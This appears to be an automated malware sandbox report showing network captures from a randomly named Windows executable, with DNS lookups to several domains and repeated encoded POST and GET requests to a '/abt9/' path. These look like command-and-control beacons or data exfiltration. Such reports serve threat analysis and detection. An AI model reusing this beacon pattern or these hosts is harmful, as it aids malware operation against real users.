                                                Jun 1, 2024 19:59:42.768488884 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:42.768644094 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:42.770765066 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:42.775695086 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:42.777395964 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:43.597502947 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:43.652518034 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:43.714338064 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:43.714829922 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:44.276547909 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:45.294523001 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:45.299768925 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:45.299910069 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:45.301719904 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:45.306653023 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.116954088 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.116990089 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.117163897 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:46.120230913 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.166703939 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:46.236881971 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.237010956 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:46.237772942 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:46.242618084 CEST8049718193.37.145.73192.168.2.7
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jun 1, 2024 19:57:40.946175098 CEST5721653192.168.2.71.1.1.1
                                                Jun 1, 2024 19:57:41.026527882 CEST53572161.1.1.1192.168.2.7
                                                Jun 1, 2024 19:58:50.763636112 CEST6490153192.168.2.71.1.1.1
                                                Jun 1, 2024 19:58:51.417244911 CEST53649011.1.1.1192.168.2.7
                                                Jun 1, 2024 19:59:07.482552052 CEST5464753192.168.2.71.1.1.1
                                                Jun 1, 2024 19:59:07.772542000 CEST53546471.1.1.1192.168.2.7
                                                Jun 1, 2024 19:59:21.467605114 CEST5763553192.168.2.71.1.1.1
                                                Jun 1, 2024 19:59:21.477257967 CEST53576351.1.1.1192.168.2.7
                                                Jun 1, 2024 19:59:29.530019045 CEST5330453192.168.2.71.1.1.1
                                                Jun 1, 2024 19:59:29.565711021 CEST53533041.1.1.1192.168.2.7
                                                Jun 1, 2024 19:59:37.623279095 CEST6102953192.168.2.71.1.1.1
                                                Jun 1, 2024 19:59:37.696751118 CEST53610291.1.1.1192.168.2.7
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jun 1, 2024 19:57:40.946175098 CEST192.168.2.71.1.1.10x9b35Standard query (0)ramirex.roA (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:58:50.763636112 CEST192.168.2.71.1.1.10x2d7fStandard query (0)www.387mfyr.sbsA (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:59:07.482552052 CEST192.168.2.71.1.1.10x5381Standard query (0)www.led-svitidla.euA (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:59:21.467605114 CEST192.168.2.71.1.1.10x3f69Standard query (0)www.andywork.oneA (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:59:29.530019045 CEST192.168.2.71.1.1.10xd9a1Standard query (0)www.slamdrops.comA (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:59:37.623279095 CEST192.168.2.71.1.1.10x1e45Standard query (0)www.beldecor.netA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jun 1, 2024 19:57:41.026527882 CEST1.1.1.1192.168.2.70x9b35No error (0)ramirex.ro188.215.50.15A (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:58:51.417244911 CEST1.1.1.1192.168.2.70x2d7fNo error (0)www.387mfyr.sbs137.220.252.40A (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:59:07.772542000 CEST1.1.1.1192.168.2.70x5381No error (0)www.led-svitidla.euled-svitidla.euCNAME (Canonical name)IN (0x0001)false
                                                Jun 1, 2024 19:59:07.772542000 CEST1.1.1.1192.168.2.70x5381No error (0)led-svitidla.eu37.235.104.9A (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:59:21.477257967 CEST1.1.1.1192.168.2.70x3f69Name error (3)www.andywork.onenonenoneA (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:59:29.565711021 CEST1.1.1.1192.168.2.70xd9a1Name error (3)www.slamdrops.comnonenoneA (IP address)IN (0x0001)false
                                                Jun 1, 2024 19:59:37.696751118 CEST1.1.1.1192.168.2.70x1e45No error (0)www.beldecor.netbeldecor.netCNAME (Canonical name)IN (0x0001)false
                                                Jun 1, 2024 19:59:37.696751118 CEST1.1.1.1192.168.2.70x1e45No error (0)beldecor.net193.37.145.73A (IP address)IN (0x0001)false
                                                • ramirex.ro
                                                • www.387mfyr.sbs
                                                • www.led-svitidla.eu
                                                • www.beldecor.net
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749710137.220.252.40806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:58:51.430025101 CEST467OUTGET /abt9/?Of5HNz9=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP6hUKp5Wb66wssc3rTHo+fACwEvPa+X6vTXJYKXAx7rcdiqsO+f3J/gP&HvxX=KFLDJ HTTP/1.1
                                                Host: www.387mfyr.sbs
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Jun 1, 2024 19:58:52.301407099 CEST691INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Sat, 01 Jun 2024 17:58:52 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.74971137.235.104.9806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:59:07.784511089 CEST743OUTPOST /abt9/ HTTP/1.1
                                                Host: www.led-svitidla.eu
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.led-svitidla.eu
                                                Referer: http://www.led-svitidla.eu/abt9/
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 220
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 68 72 59 53 48 71 56 6b 46 49 6a 66 6a 58 31 7a 64 41 46 31 70 63 52 76 45 5a 73 41 66 46 46 36 65 72 67 6b 49 59 71 6b 2b 2f 6a 62 38 63 63 37 69 2b 59 59 34 6a 31 42 78 4b 33 6c 6d 6d 34 4f 34 74 34 62 59 33 4a 54 4a 55 6a 4e 70 63 6a 61 2f 4e 45 69 79 4a 5a 6f 63 72 69 36 67 51 61 51 7a 6a 73 77 53 4f 39 64 42 73 74 46 6d 45 50 50 4e 75 4b 57 38 68 33 52 34 4c 4e 69 56 73 46 47 34 6b 78 62 71 58 4e 2b 34 59 45 46 70 6b 45 62 30 62 62 4f 2b 32 6e 45 4f 78 38 61 7a 37 6d 35 48 50 53 61 39 6b 38 71 70 6f 71 4c 32 4c 6b 36 77 52 4d 62 34 33 49 37 30 4d 6f 45 65 48 72 51 77 59 54 4e 51 67 3d 3d
                                                Data Ascii: Of5HNz9=vXV6eoPdJ47RhrYSHqVkFIjfjX1zdAF1pcRvEZsAfFF6ergkIYqk+/jb8cc7i+YY4j1BxK3lmm4O4t4bY3JTJUjNpcja/NEiyJZocri6gQaQzjswSO9dBstFmEPPNuKW8h3R4LNiVsFG4kxbqXN+4YEFpkEb0bbO+2nEOx8az7m5HPSa9k8qpoqL2Lk6wRMb43I70MoEeHrQwYTNQg==
                                                Jun 1, 2024 19:59:08.636246920 CEST544INHTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:08 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1;mode=block
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.74971237.235.104.9806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:59:10.316728115 CEST763OUTPOST /abt9/ HTTP/1.1
                                                Host: www.led-svitidla.eu
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.led-svitidla.eu
                                                Referer: http://www.led-svitidla.eu/abt9/
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 240
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 37 4c 6f 53 47 4c 56 6b 48 6f 6a 63 39 6e 31 7a 4b 51 45 64 70 63 64 76 45 63 63 51 66 51 74 36 65 4f 45 6b 50 64 47 6b 72 2f 6a 62 33 38 63 2b 74 65 59 58 34 6a 78 7a 78 4c 4c 6c 6d 6d 73 4f 34 74 6f 62 59 46 68 51 50 55 6a 4c 79 73 6a 55 79 74 45 69 79 4a 5a 6f 63 72 6d 51 67 51 43 51 76 48 6f 77 64 50 39 65 66 63 74 43 77 30 50 50 4a 75 4b 53 38 68 33 6a 34 4b 52 62 56 71 5a 47 34 67 35 62 72 43 68 39 68 6f 45 44 6e 45 46 76 6b 62 44 48 35 79 6a 66 4c 43 51 50 35 4d 75 4a 43 35 50 34 6e 47 77 47 33 35 53 77 79 4a 41 4d 6e 33 52 75 36 32 4d 6a 35 75 63 6c 42 77 4f 36 39 4b 79 4a 47 5a 78 59 6e 2b 66 35 30 58 6b 53 4d 74 75 6d 67 79 71 41 43 6d 30 3d
                                                Data Ascii: Of5HNz9=vXV6eoPdJ47R7LoSGLVkHojc9n1zKQEdpcdvEccQfQt6eOEkPdGkr/jb38c+teYX4jxzxLLlmmsO4tobYFhQPUjLysjUytEiyJZocrmQgQCQvHowdP9efctCw0PPJuKS8h3j4KRbVqZG4g5brCh9hoEDnEFvkbDH5yjfLCQP5MuJC5P4nGwG35SwyJAMn3Ru62Mj5uclBwO69KyJGZxYn+f50XkSMtumgyqACm0=
                                                Jun 1, 2024 19:59:11.168515921 CEST544INHTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:11 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1;mode=block
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.74971337.235.104.9806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:59:12.849035978 CEST1776OUTPOST /abt9/ HTTP/1.1
                                                Host: www.led-svitidla.eu
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.led-svitidla.eu
                                                Referer: http://www.led-svitidla.eu/abt9/
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1252
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 37 4c 6f 53 47 4c 56 6b 48 6f 6a 63 39 6e 31 7a 4b 51 45 64 70 63 64 76 45 63 63 51 66 57 31 36 66 34 59 6b 50 36 79 6b 74 50 6a 62 36 63 63 2f 74 65 59 77 34 6a 4a 33 78 4c 47 48 6d 6b 55 4f 34 4f 51 62 61 30 68 51 61 6b 6a 4c 36 4d 6a 56 2f 4e 46 2f 79 49 6f 68 63 71 57 51 67 51 43 51 76 47 59 77 61 65 39 65 64 63 74 46 6d 45 50 49 4e 75 4b 32 38 68 2f 5a 34 4b 56 4c 55 5a 42 47 34 42 46 62 73 77 5a 39 70 6f 45 42 71 6b 46 33 6b 62 2b 66 35 7a 4c 39 4c 43 55 6c 35 4c 71 4a 42 66 61 4d 7a 6b 46 65 74 37 57 44 74 76 6b 62 6c 57 38 53 69 47 63 4f 7a 49 4d 59 43 44 48 47 6d 6f 36 6c 42 63 6b 4b 36 63 33 78 7a 33 6b 63 42 4c 48 45 78 44 43 47 42 53 50 7a 4b 38 56 68 63 4d 53 72 6f 6c 63 47 2f 74 2b 6d 42 41 6b 58 46 48 65 44 47 75 77 4b 4d 76 6c 77 51 65 78 7a 35 67 73 67 79 4d 54 45 68 30 35 6e 33 55 4a 47 4d 49 78 48 73 65 72 56 2b 33 59 48 6c 69 6b 79 4d 52 43 64 69 2b 65 78 51 64 77 75 33 49 7a 43 6c 58 47 4d 76 50 4a 4e 54 58 61 4a 2b 4a [TRUNCATED]
                                                Data Ascii: Of5HNz9=vXV6eoPdJ47R7LoSGLVkHojc9n1zKQEdpcdvEccQfW16f4YkP6yktPjb6cc/teYw4jJ3xLGHmkUO4OQba0hQakjL6MjV/NF/yIohcqWQgQCQvGYwae9edctFmEPINuK28h/Z4KVLUZBG4BFbswZ9poEBqkF3kb+f5zL9LCUl5LqJBfaMzkFet7WDtvkblW8SiGcOzIMYCDHGmo6lBckK6c3xz3kcBLHExDCGBSPzK8VhcMSrolcG/t+mBAkXFHeDGuwKMvlwQexz5gsgyMTEh05n3UJGMIxHserV+3YHlikyMRCdi+exQdwu3IzClXGMvPJNTXaJ+JrzNd7AW14xa6c3sp1FLkVNeJ0XEcAXKMvrJWGSijnZa0Fx+owaYlurZy9lM77oqR+Yk3yUkGjwAukIEAb6LbXEWxxbdc4beQ08uPAyPsXqXPf7U6yR8otgHQWsV+sBHSnCAx10PS1M0GcNVQyVCjq9ziWSbNNJmuLVAKVwPaZ2DHJHx+7UyhnTvv+folg1IBuKFfbWjYBGx7IubfltlGxUO8ntAbi6nYxzUG58k6UllxrqQyZT1yaIxAa8Zcaof7ZbbIy4sEDIyA9iuASRRqVp3RPiGf1SxWRMDVY7u80g1WflCKdUvS4W+Sr6SddRhP+2dyXuL34z75gnMWDW51d0xfVLt/BoIllVHOVcO+/VQFHwvAaEAq1Nr0tmipa0uOsqF68pHFQTIdrd+YswDQBOF/jgsBxfgBXuIzBEVg/3f5btUOs4li5bsVcTy+a+SUHJkxBfeT6zmEhlkqBczNQiN9jaJjZkx3Ui6UBVNA6FAjoP0ExmIuOYCSjDFST2DYx5j2LbjBwgRYrei0xXSJbqtlT9RqFRJV58uvTK3LxsCWwstIFdx9fFLs/reUTHLQqkU8abIXkUwmsYKkCj677AWm4pim3o04+9rN1ahc3Ph87kUXttZxL58qkrOI8+f24K8BqfpG+LLE4v0pIqrJP3hy/wEXq3Q9er [TRUNCATED]
                                                Jun 1, 2024 19:59:13.685551882 CEST544INHTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:13 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1;mode=block
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.74971437.235.104.9806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:59:15.465473890 CEST471OUTGET /abt9/?Of5HNz9=iV9adYjvPp7RuLwaP6BmForAyDRLfg4mpsRDBpobO1h4QpcDO6+h8uyV1/sip+su221s2KGGsEsC4t0dUTAnOg7+9cTY95M3z71wQoeHgy2DqTBwSPZzUbg36nzdDZOI6y7kx7FtYrhA&HvxX=KFLDJ HTTP/1.1
                                                Host: www.led-svitidla.eu
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Jun 1, 2024 19:59:16.317831993 CEST544INHTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:16 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1;mode=block
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.749715193.37.145.73806256C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 1, 2024 19:59:37.706533909 CEST734OUTPOST /abt9/ HTTP/1.1
                                                Host: www.beldecor.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.beldecor.net
                                                Referer: http://www.beldecor.net/abt9/
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 220
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
